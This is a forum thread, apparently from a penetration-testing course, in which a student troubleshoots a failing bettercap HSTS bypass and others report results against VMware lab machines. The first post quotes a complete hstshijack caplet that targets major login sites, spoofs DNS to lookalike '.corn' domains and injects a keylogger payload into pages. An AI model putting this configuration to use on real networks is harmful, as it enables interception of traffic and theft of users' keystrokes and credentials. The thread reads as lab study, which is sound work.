HSTS Bypass won't work

I was following the tutorial and was following the hsts bypass.
I downloaded the file he put in the caption under and deleted the old buggy one.
This is the exact code in the hstshijack.cap file:
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,.twitter.com,facebook.com,.facebook.com,apple.com,.apple.com,ebay.com,.ebay.com,www.linkedin.com,accounts.google.com,.google.com
set hstshijack.replacements twitter.corn,
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,linkedin.com,accounts.google.corn,*.google.corn

http.proxy on
dns.spoof on
Without the quotes ofcourse. Then I tried connecting through google and the https bypass mostly works but the hsts does not work at all. What should I do to fix this. I ran bettercap and then ran the hsts command

Some of it may appear italic because the star sometimes makes that but there is an apostrophe there

Not sure how to solve this. There have been many questions on this and I don’t see any solution. You can go through the forum posts and try the solutions but I can’t say if it will work.

I experienced the same issue.
When I attacked the Windows 10 (VMware) edge browser, it failed.
When attacking a Kali (VMware) with a Firefox, or Palemoon the attacks were successful.

I’ve just tried it again but it failed.
I cleared cache from all web browsers, and it failed. S:

The direct access to the infected URL from most web browsers (Win10 with Firefox and Edge, Kali with Firefox and Palemoon) was successful